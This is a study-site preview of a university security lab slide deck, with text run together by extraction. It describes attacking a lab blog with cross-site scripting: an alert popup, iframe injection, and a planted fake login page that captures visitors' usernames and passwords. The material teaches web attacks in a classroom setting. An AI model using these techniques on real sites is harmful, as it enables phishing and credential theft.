Docsity
Log inSign up
Docsity
Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity

Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan

Guidelines and tips
Guidelines and tips
Sell on Docsity
Sell on Docsity
Log inSign up

Prepare for your exams

Study with the several resources on Docsity

Find documents

Prepare for your exams with the study notes shared by other students like you on Docsity

Search Store documents

The best documents sold by students who completed their studies

Search through all study resources
Docsity AINEW

Summarize your documents, ask them questions, convert them into quizzes and concept maps

Explore questions

Clear up your doubts by reading the answers to questions asked by your fellow students

Earn points to download

Earn points by helping other students or get them with a premium plan

Share documents
download point icon20 Points

For each uploaded document

Answer questions
download point icon5 Points

For each given answer (max 1 per day)

All the ways to get free points
Get points immediately

Choose a premium plan with all the points you need

Study Opportunities

Choose your next study program

Get in touch with the best universities in the world. Search through thousands of universities and official partners

Community

Ask the community

Ask the community for help and clear up your study doubts

University Rankings

Discover the best universities in your country according to Docsity users

Free resources

Our save-the-student-ebooks!

Download our free guides on studying techniques, anxiety management strategies, and thesis advice from Docsity tutors

From our blog

Exams and Study
Go to the blog

Remote Human Exploitation: Attack a Forum using Cross Site Scripting | ECPE 178, Lab Reports of Cryptography and System Security

University of the Pacific (UOP)Cryptography and System Security

Material Type: Lab; Class: Computer Network Security; Subject: Electrcl & Computer Engr; University: University of the Pacific; Term: Fall 2007;

Typology: Lab Reports

Pre 2010

Uploaded on 08/19/2009

koofers-user-vh7
koofers-user-vh7 🇺🇸

10 documents

1 / 11

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
LAB #12LAB #12
Your Your
assignment, assignment,
should you should you
choose to accept choose to accept
it…it…
12/20/2007 1LAB 12
If any of your force be killed or
captured, the secretary will
disavow any knowledge of your
actions...this tape will self destruct
in 5 seconds...
Good Luck, Jim
itit
Remote/human Remote/human
exploitation: Attack a exploitation: Attack a
forum using crossforum using cross--site site
scripting (XSS)scripting (XSS)
pf3
pf4
pf5
pf8
pf9
pfa

Partial preview of the text

Download Remote Human Exploitation: Attack a Forum using Cross Site Scripting | ECPE 178 and more Lab Reports Cryptography and System Security in PDF only on Docsity!

LAB #12LAB

YourYourassignment,assignment,should youshould youchoose to acceptchoose to accept it…it…

LAB 12

If any of your force be killed orcaptured, the secretary willdisavow any knowledge of youractions...this tape will self destructin 5 seconds... Good Luck, Jim

it…it… Remote/humanRemote/humanexploitation: Attack aexploitation: Attack aforum using crossforum using cross-

-site

site

scripting (XSS)scripting (XSS)

LAB #12LAB

Scenario

You have a remote target, a popular forum website that yourhuman targets use to post comments to one another. Yourtask is to use XSS to modify that site in a way that tricksyour targets into giving you information. Barring that, atleast let the site owner there’s a problem by inserting an alert popup.

12/20/

LAB 12

popup. Choose your target:

http://www.jkandtc.com/blog

everyone shares,

fighting each other!

or http://www.jkandtc.com/

n

/blog

yours to do whatever!

Where

n

  • your laptop number (01, 02, 03, etc.)

LAB #12LAB

Potential Show Stoppers

  1. The site creator must not filter user input.2. Your IP address will be logged.

LAB 12

Log into:www.jkandtc.com/<pc-num>For example:www.jkandtc.com/01Then click on “Blog” LAB 12

Inserting Javascript thatcreates a pop-up…

LAB 12

What appears after the pop-up is closed

Attacker’s “comment”

An IFrame XSS Attack

LAB 12

Now, let’s perform an IFrame

injection attack against a very

popular

website (e.g. YouTube). The attackerinjects his complete malicious

website

into the popular site!

Attacker’s “comment”

Use W2000 IP

Let’s be Sysadmin

LAB 12

Here, we insert the login page at theattacker’s website – if the victim falls for it,the attacker gets the blog visitor’s usernameand password….

  • LAB